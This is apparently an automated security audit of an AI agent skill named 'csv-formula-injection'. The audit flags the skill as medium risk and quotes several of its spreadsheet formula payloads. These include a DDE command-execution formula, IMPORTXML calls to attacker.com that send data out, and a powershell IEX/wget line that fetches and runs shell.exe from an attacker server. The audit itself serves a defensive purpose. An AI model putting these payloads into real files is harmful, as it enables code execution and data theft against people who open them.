csv-formula-injection

Warn

Audited by Gen Agent Trust Hub on Apr 22, 2026

Risk Level: MEDIUM
COMMAND_EXECUTION, DATA_EXFILTRATION, REMOTE_CODE_EXECUTION
Full Analysis
  • [COMMAND_EXECUTION]: The skill documents several Dynamic Data Exchange (DDE) injection patterns, such as DDE("cmd";"/C calc";"!A0"), which are designed to execute arbitrary system commands when a victim opens a specially crafted CSV or spreadsheet file in applications like Excel or LibreOffice.
  • [DATA_EXFILTRATION]: The instructions include payloads utilizing Google Sheets functions like IMPORTXML, IMPORTHTML, and IMPORTDATA (e.g., =IMPORTXML("http://attacker.com/", "//a/@href")). These functions can be used to exfiltrate data from a spreadsheet to an external server via outbound network requests.
  • [REMOTE_CODE_EXECUTION]: A high-risk payload for remote code execution is provided in the documentation: =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0. This pattern enables an attacker to download and execute an external script or executable on the target host.
Audit Metadata
Risk Level: MEDIUM
Analyzed: Apr 22, 2026, 05:03 PM